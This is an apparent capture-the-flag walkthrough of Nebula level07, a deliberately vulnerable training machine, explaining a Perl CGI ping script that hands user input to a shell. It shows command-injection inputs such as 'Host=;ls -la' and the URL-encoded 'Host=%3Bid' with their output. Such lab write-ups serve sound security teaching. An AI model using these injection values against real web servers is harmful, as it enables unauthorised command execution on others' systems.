Nebula level07 Walkthrough

Nebula is a vulnerable virtual machine which has a variety of weaknesses and vulnerabilities in a Linux system.

Description of level07
“The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.”

Breakdown of the above program
use CGI qw{param};
The CGI module parses the incoming CGI request correctly.
sub ping
A ping subroutine which pings a particular host with is dynamically taken from the user.
ping(param(“Host”));
Later the ping subroutine is called with the parameter Host.

Inspecting the /home/flag07

level07@nebula:/home/flag07$ ls
index.cgi thttpd.conf

Contents of thttpd.conf

The config file gives away some juicy information on Line 7 and 52. The web server is running on port 7007 and is running as user flag07.

Inspecting the program
In the Shell

level07@nebula:/home/flag07$ ./index.cgi
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
</pre></body></html>
level07@nebula:/home/flag07$ ./index.cgi Host=127.0.0.1
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_req=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_req=2 ttl=64 time=0.021 ms
64 bytes from 127.0.0.1: icmp_req=3 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.014/0.020/0.027/0.007 ms
</pre></body></html>
level07@nebula:/home/flag07$ ./index.cgi Host=;ls -la
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
</pre></body></html>total 10
drwxr-x--- 2 flag07 level07 102 2011-11-20 20:39 .
drwxr-xr-x 1 root root 180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag07 flag07 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag07 flag07 3353 2011-05-18 02:54 .bashrc
-rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 flag07 flag07 675 2011-05-18 02:54 .profile
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf

Game Plan
In the Browser
URL Encoding is key
http://192.168.1.9:7007/index.cgi?Host=;id
http://192.168.1.9:7007/index.cgi?Host=%3Bid

Happy Hacking !!!